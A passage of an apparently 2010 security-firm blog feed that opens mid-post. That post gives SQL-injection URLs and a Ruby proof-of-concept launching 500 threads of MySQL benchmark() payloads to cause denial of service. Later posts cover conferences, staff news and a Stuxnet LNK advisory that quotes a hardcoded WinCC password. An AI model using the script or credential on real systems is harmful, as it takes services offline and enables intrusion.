storage data (products, prices, clients, etc.), can have it's services interrupted. The URL example below is responsible for seeking at the data base the product identified by the parameter id=100 and show them to the user. &lt;br /&gt;&lt;br /&gt; http://e-commerce.example.com/products.php?cat=2&amp;id=100&lt;br /&gt;&lt;br /&gt;An attack scene for denial of service would be to send the following query several times.&lt;br /&gt;&lt;br /&gt; http://e-commerce.example.com/products.php?cat=2&amp;id=100+select+benchmark(9000000000000000000000000000000,ENCODE(0x65,0x65))%23%23&lt;br /&gt;&lt;br /&gt;As a proof of concept a ruby script was developed to exploit this vulnerability, in the case of a Web application is vulnerable to SQL injection.&lt;br /&gt;&lt;br /&gt;#!/usr/bin/ruby&lt;br /&gt;#Telspace Systems - www.telspace.co.za - info[@]telspace.co.za&lt;br /&gt;&lt;br /&gt;require 'net/http'&lt;br /&gt;require 'uri'&lt;br /&gt;require 'optparse'&lt;br /&gt;&lt;br /&gt;# Command line options&lt;br /&gt;&lt;br /&gt;options = {}&lt;br /&gt;OptionParser.new do |opts|&lt;br /&gt;&lt;br /&gt;  options[:url] = nil&lt;br /&gt;  opts.on('-u', '--url',"Specify an URL vulnerable for MySQL Injection\n\n") do&lt;br /&gt;    options[:url] = ARGV[0]&lt;br /&gt;  end&lt;br /&gt;&lt;br /&gt;end.parse!&lt;br /&gt;&lt;br /&gt;# HTTP config&lt;br /&gt;&lt;br /&gt;if options[:url] != nil&lt;br /&gt;  $base_url = options[:url].match(/http:\/\/(.*)\//).to_s&lt;br /&gt;  $vuln_param = options[:url].scan(/\/\/[^\/]*(.*)/).to_s&lt;br /&gt;&lt;br /&gt;else&lt;br /&gt;  puts "\tUse -u or --url to specify an URL vulnerable to MySQL Injection\n\n"&lt;br /&gt;  exit&lt;br /&gt;&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;# Attack config&lt;br /&gt;&lt;br /&gt;threads = 500&lt;br /&gt;$payload1 = "+and+(select+benchmark(9000000000000000000000000000000,sha1(sha1(0x65))))%23%23"&lt;br /&gt;$payload2 = "'+and+(select+benchmark(9000000000000000000000000000000,sha1(sha1(0x65))))%23%23"&lt;br /&gt;&lt;br /&gt;# HTTP interface&lt;br /&gt;def build_http_request()&lt;br /&gt;  begin&lt;br /&gt;      uri = URI.parse($base_url)&lt;br /&gt;      request = Net::HTTP.new(uri.host,uri.port)&lt;br /&gt;      rescue Exception =&gt; error2&lt;br /&gt;        store_logs = error2.inspect&lt;br /&gt;      return request&lt;br /&gt;  end&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;# Send multiples requests&lt;br /&gt;&lt;br /&gt;1.upto(threads){|i|&lt;br /&gt;    threads = Thread.new do&lt;br /&gt;      puts "Send request " + i.to_s&lt;br /&gt;      request = build_http_request()&lt;br /&gt;      request.request_get($vuln_param+$payload1)&lt;br /&gt;      request.request_get($vuln_param+$payload2)&lt;br /&gt;   end&lt;br /&gt;}&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-6177797847404154897?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/6177797847404154897/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=6177797847404154897' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6177797847404154897'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/6177797847404154897'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/09/mysql-query-timeout-remote-denial-of.html' title='MySQL query timeout remote Denial of Service'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-1912512747623736172</id><published>2010-09-08T16:02:00.010+02:00</published><updated>2010-09-08T16:21:34.661+02:00</updated><title type='text'>IIR Conference 2010</title><content type='html'>&lt;p&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Telspace Systems have been invited to present their 'Next Generation Botnets' talk at &lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.iir.co.za/"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;The Institute for International Research's (IIR)&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.iir.co.za/detail.php?e=2315"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;IT Risk Management Conference &lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;on 10&lt;/span&gt;&lt;/span&gt;&lt;sup&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;th&lt;/span&gt;&lt;/span&gt;&lt;/sup&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; October 2010 at the &lt;/span&gt;&lt;/span&gt;&lt;st1:placename st="on"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;IIR&lt;/span&gt;&lt;/span&gt;&lt;/st1:placename&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;st1:placename st="on"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Conference&lt;/span&gt;&lt;/span&gt;&lt;/st1:placename&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;st1:placetype st="on"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Center&lt;/span&gt;&lt;/span&gt;&lt;/st1:placetype&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; in &lt;/span&gt;&lt;/span&gt;&lt;st1:place st="on"&gt;&lt;st1:city st="on"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Rosebank&lt;/span&gt;&lt;/span&gt;&lt;/st1:city&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;, &lt;/span&gt;&lt;/span&gt;&lt;st1:country-region st="on"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;South Africa&lt;/span&gt;&lt;/span&gt;&lt;/st1:country-region&gt;&lt;/st1:place&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;“&lt;/span&gt;&lt;/span&gt;&lt;strong&gt;&lt;b&gt;&lt;span style="font-weight: normal;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;IIR’s IT Risk Management Conference&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/strong&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; will explore the challenges and current risks facing the IT Professional in the South African market and provide up-to-date techniques and experiences in assessing and averting risk. The expert speakers featured at this event come from a variety of sectors and are industry leaders in th&lt;/span&gt;&lt;/span&gt;&lt;span style="color: windowtext;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;eir &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;respective fields, providing you with specialist and practical advice.”&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Some of the other presentations that we are looking forward to includes:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-left: 36pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;·&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; "&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;b&gt;&lt;span style="font-weight: bold;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Cloud Computing and its impact on IT Risk Management.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-left: 36pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;·&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; "&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;b&gt;&lt;span style="font-weight: bold;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;An investigation into the use of social networking sites by employees and the effects on your IT Security. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-left: 36pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;·&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; "&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;b&gt;&lt;span style="font-weight: bold;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;How to secure your organisation in the event of disaster. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-left: 36pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;·&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; "&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;b&gt;&lt;span style="font-weight: bold;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;The security and risk implications of importing software.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-left: 36pt; text-indent: -18pt;"&gt;&lt;!--[if !supportLists]--&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;·&lt;/span&gt;&lt;/span&gt;&lt;span style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; "&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;         &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;b&gt;&lt;span style="font-weight: bold;"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;Implementing an IT Risk Management policy to safe guard against internal risks. &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;&lt;br /&gt;Telspace Systems is also pleased to announce the launch of their new &amp;amp; updated website &lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.telspace.co.za/"&gt;&lt;span class="Apple-style-span"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;http://www.telspace.co.za&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-1912512747623736172?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/1912512747623736172/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=1912512747623736172' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1912512747623736172'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1912512747623736172'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/09/iir-conference-2010.html' title='IIR Conference 2010'/><author><name>Andries</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-5153962025018044391</id><published>2010-08-06T15:13:00.002+02:00</published><updated>2010-08-06T15:26:33.443+02:00</updated><title type='text'>ISSA 2010</title><content type='html'>It’s been a while since I last posted on the blog; this is thankfully due to how busy we have been on this side. &lt;br /&gt;&lt;br /&gt;This week Telspace Systems presented at the prestigious ISSA 2010 conference held at the Sandton Convention Centre in Johannesburg, South Africa.&lt;br /&gt;&lt;br /&gt;Telspace Systems presented on Next Generation Botnets, Our talk should be available soon for download via their website at &lt;a href="http://www.infosecsa.co.za"&gt;www.infosecsa.co.za&lt;/a&gt; . The talk was very well received and we have been invited to present at a few other universities in South Africa later this year. I can also highly recommend attending net year’s ISSA conference due to the level of expertise of the talks as well as the general atmosphere.&lt;br /&gt;&lt;br /&gt;Amongst the list of headline speakers was Craig Rosewarne. Craig presented a great talk on the trends of information security and whats in store for us in the future in South Africa. His talk took a broad view at South African history and compared it with information security as a whole. This is definitely a talk worth reviewing and I do recommend a revision of his slides.&lt;br /&gt;&lt;br /&gt;We have a lot of news coming up at Telspace Systems so I’ll definitely try updating you as much as possible in between the huge projects that we have at the moment.&lt;br /&gt;&lt;br /&gt;Be safe and keep well.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-5153962025018044391?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/5153962025018044391/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=5153962025018044391' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5153962025018044391'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/5153962025018044391'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/08/issa-2010.html' title='ISSA 2010'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-3341577916946216855</id><published>2010-07-21T21:15:00.004+02:00</published><updated>2010-07-21T21:30:27.337+02:00</updated><title type='text'>Just a few notes about a new 0-day vulnerability for our clients...</title><content type='html'>After the notorious &lt;a href="http://www.adobe.com/support/security/advisories/apsa10-01.html"&gt;Adobe Flash 0-day&lt;/a&gt; that put the security community on alert at the end of May, it is now time for a new vulnerability to steal the thunder. A few days ago Microsoft has released a security advisory (&lt;a href="http://www.microsoft.com/technet/security/advisory/2286198.mspx"&gt;2286198&lt;/a&gt;) warning his costumers about a critical security flaw. As detailed on the advisory, all maintained version of Windows Operating System are affected by the issue. Other areas confirm that other non-maintained versions of the operating system like Windows 2000 SP4 and Windows XP SP2 are &lt;a href="http://www.f-secure.com/weblog/archives/00001991.html"&gt;still affected&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;This vulnerability, cataloged as &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568"&gt;CVE-2010-2568&lt;/a&gt;, lies on the Windows Shell component and occurs due the incorrectly way Windows parses shortcut references (files containing the .lnk extension). The advisory also details that it is possible to take advantage of this flaw in a malicious way to allow remote code execution.&lt;br /&gt;&lt;br /&gt;As reported on June 16th by the &lt;a href="http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx"&gt;MPCC&lt;/a&gt; (Microsoft Malware Protection Center), a worm called Stuxnet that takes advantage of this vulnerability was already being monitored and is suspected to be spreading in the wild for at least a month, possibly longer. According to them, USB removable devices are the main instrument used in order to propagate it, but other infection mechanisms could also be used as Windows file shares and WebDav.&lt;br /&gt;&lt;br /&gt;According to &lt;a href="http://www.sophos.com/blogs/chetw/g/2010/07/16/windows-day-attack-works-windows-systems/"&gt;Chester Wisniewski&lt;/a&gt;, the flaw occurs when shell32.dll tries to load control panel icons from applets. It is possible to create a specially crafted shortcut that points to a malicious file. That way, when the folder gets displayed (using Windows explorer for example) the LNK file will be charged to load and execute the malicious payload. Notice that the .lnk file just carries the exploitation/infection vector that leads the drivers to be executed.&lt;br /&gt;&lt;br /&gt;As pointed out by Chet on the same SophosLabs blog post, the analysis performed against an infected USB device containing the malicious code shows that the crafted shortcut file loads two drivers: mrxcls.sys and mrxnet.sys.&lt;br /&gt;&lt;br /&gt;These two drivers basically consist of a rootkit and once executed it installs a backdoor on the system, hides the presence of malicious files on the removable USB device and injects encrypted data blobs that seems to serve to the basic rootkit infrastructure.&lt;br /&gt;&lt;br /&gt;What has raised special attention is that these drivers were signed using a private key that belongs to &lt;a href="http://www.realtek.com/"&gt;Realtek Semiconductor Corp&lt;/a&gt;. a well known IC design and peripheral manufacturer company. This characteristic let the drivers to run unnoticed, without causing any warning to be exhibited to the user. How the attacker(s) manage to get their drivers signed by Realtek is still unknown.&lt;br /&gt;&lt;br /&gt;The MMPC teams have worked together with VeriSign and Realtek to revoke the certificate and issue a new one. Although, according &lt;a href="http://www.f-secure.com/weblog/archives/00001987.html"&gt;F-secure&lt;/a&gt; it is still possible to use the certificate due the countersignature method of time stamping that allows signatures to be verified even after the certificate has expired or been revoked.&lt;br /&gt;&lt;br /&gt;Looking at the malware behavior, &lt;a href="http://www.h-online.com/security/news/item/Trojan-spreads-via-new-Windows-hole-1038992.html"&gt;Frank Boldewin&lt;/a&gt; found some database queries that target the Siemens SIMATIC WinCC SCADA system, a computer system used to control and monitor critical infrastructure operations such the ones performed in power plants and large communication systems. According the &lt;a href="http://it.slashdot.org/comments.pl?sid=1721020&amp;amp;cid=32920758"&gt;Slashdot post&lt;/a&gt; the product uses a hardcoded username and password to access its database system (Server=.\WinCC;uid=WinCCConnect;pwd=2WSXcder).&lt;br /&gt;&lt;br /&gt;When you don't work for a company that operates critical infrastructure services you should not be worried about the malware it in the first place. But since a proof of concept code was released on &lt;a href="http://www.exploit-db.com/exploits/14403/"&gt;exploit-db.com&lt;/a&gt; on June 18th, we can expect more payloads to emerge and ends up being triggered by the LNK vulnerability.&lt;br /&gt;&lt;br /&gt;Another important thing to mention is that a lot of questions are raised up these days concerning AutoRun and AutoPlay. As described on Seans post at &lt;a href="http://www.f-secure.com/weblog/archives/00001992.html"&gt;F-Secure Weblog&lt;/a&gt;, the vulnerability could be exploited even if AutoRun and AutoPlay are disabled. However, as happened with the Conficker, these features could be used to trick a user and get the code executed, but it is definitely not required. In order to get the payload executed it is just necessary to display the folder content with the crafted LNK file inner in.&lt;br /&gt;&lt;br /&gt;In order to mitigate the issue until Microsoft properly releases a patch some workarounds were proposed as disabling the displaying of icons for shortcuts and disabling WebClient service, more details about how to perform such operations could be checked on the Microsoft Advisory (&lt;a href="http://www.microsoft.com/technet/security/advisory/2286198.mspx"&gt;2286198&lt;/a&gt;). Other solution as proposed on the &lt;a href="http://www.sophos.com/blogs/chetw/g/2010/07/16/windows-day-attack-works-windows-systems/"&gt;SophosLabs blog post&lt;/a&gt; involves the deploy of a GPO (Group Policy Object) disallowing the use of executable files that are not on the C: drive which I believe is the best way to mitigate the problem until the patch is released.&lt;br /&gt;&lt;br /&gt;More information about this malware could be verified on the &lt;a href="http://www.sophos.com/blogs/chetw/g/2010/07/16/windows-day-attack-works-windows-systems/"&gt;Chet post&lt;/a&gt; including a video demonstrating the attack and in the &lt;a href="http://www.f-secure.com/weblog/archives/new_rootkit_en.pdf"&gt;PDF document&lt;/a&gt; wrote by Kupreev Oleg and Ulasen Sergey from &lt;a href="http://anti-virus.by/en/"&gt;VirusBlokAda&lt;/a&gt;, a Belorussian based company who first discovered and analyzed the exploit.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-3341577916946216855?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/3341577916946216855/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=3341577916946216855' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3341577916946216855'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/3341577916946216855'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/07/just-few-notes-about-new-0-day.html' title='Just a few notes about a new 0-day vulnerability for our clients...'/><author><name>Gustavo</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-2739154022349211709</id><published>2010-05-28T09:20:00.003+02:00</published><updated>2010-06-11T18:59:00.284+02:00</updated><title type='text'>Hello world!</title><content type='html'>Hi, my name is Gustavo and I have joined the Telspace Systems crew as a senior security analyst at the beginning of May.&lt;br /&gt;&lt;br /&gt;Now you should probably be asking yourself.. Who the hell is Gustavo? Who cares about him anyway =]&lt;br /&gt;&lt;br /&gt;Well, one of my first activities here at Telspace requires me to write a blog post introducing myself. I am definitely not good with blog words, but I will try to make things painless and quick for everyone who is interested.&lt;br /&gt;&lt;br /&gt;I am from Brazil... hope this fact waivers a presentation about being a soccer fanatic (in a good way) and my expectations regarding 2010 world cup hehe. As i was saying, I am directly involved in computer security for 10 years now. I have spent the last 4 years working for a market-leading security company here in Brazil performing penetration tests and security assessments for brazilian government and other high profile customers. Furthermore, I am very happy to have joined the Telspace crew and I am very excited about my work here. I will also be in charge of heading up expansion in Brazil, adding to all of Telspace Systems Brazilian clients.&lt;br /&gt;&lt;br /&gt;Feel free to contact me to share and discuss computer related stuff, or just to chat about any subject of mutual interest =]&lt;br /&gt;&lt;br /&gt;By the way, my new, fancy mail is: gustavo *DO_NOT_SPAM_ME* telspace dot co dot za&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-2739154022349211709?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/2739154022349211709/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=2739154022349211709' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/2739154022349211709'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/2739154022349211709'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/05/hello-world.html' title='Hello world!'/><author><name>Gustavo</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-4144898684030147880</id><published>2010-05-19T16:14:00.002+02:00</published><updated>2010-05-19T16:21:29.532+02:00</updated><title type='text'>Welcome Gustavo...</title><content type='html'>It was great to catch up with many friends and collegues at this years ITWeb Security Summit in Johannesburg. As one of the sponsors of the Security Summit, I trust that you enjoyed the 2 day conference and gained some value out of it. I look forward to some of your feedback and comments regarding it.&lt;br /&gt;&lt;br /&gt;Telspace Systems has had some busy and exciting months this year. Our Web Application Assessment and Attack and Penetration testing side has grown in leaps and bounds. Due to this, we have hired 2 more staff to come on board our team. It's important to keep you up to speed with what's happening here, since we are experiencing a rather large amount of change and growth recently.&lt;br /&gt;&lt;br /&gt;Gustavo Pimentel Bittencourt has been hired as one of our new senior security analysts. Gustavo will be assisting our clients in providing very high level, web application assessments and infrastructure penetration testing. Gustavo was a scholarship holder of CNPq (Brazilian National Council for Scientific and Technologic Development) working as intern researcher at C.E.S.A.R. (Center for Studies of Advanced Systems of Recife), a well-known research and software development center in Brazil. Gustavo has presented at many international conferences and has also provided training worldwide at various international conferences. Since joining our team in April 2010, Gustavo has completed a number of high level assessments for our clients.&lt;br /&gt;&lt;br /&gt;We're always looking for exceptional talent, if you feel you have what it takes please send us an email with your CV.&lt;br /&gt;&lt;br /&gt;Telspace Systems will also be running Web Application Hacking 101, one of our most popular courses during July 2010. If you're interested in attending, please contact us.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-4144898684030147880?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/4144898684030147880/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=4144898684030147880' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4144898684030147880'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/4144898684030147880'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2010/05/welcome-gustavo.html' title='Welcome Gustavo...'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-6364747836094916173</id><published>2010-05-05T13:21:00.003+02:00</published><updated>2010-05-05T13:44:47.475+02:00</updated><title type='text'>HITB and more...</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_4Wfys5NtIhA/S-FZhHSOQRI/AAAAAAAAACQ/TIBZzti9t94/s1600/resized_dsc02874.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 240px; height: 320px;" src="http://2.bp.blogspot.com/_4Wfys5NtIhA/S-FZhHSOQRI/AAAAAAAAACQ/TIBZzti9t94/s320/resized_dsc02874.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5467749848030527762" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Telspace Systems had a successful visit to Hack in the Box 2010 (HITB) Dubai, despite the ash cloud putting a bit of damper on the number of attendees :) . The HITB guys didn’t let it get in the way of presentations, though, as they set it up so that the speakers’ 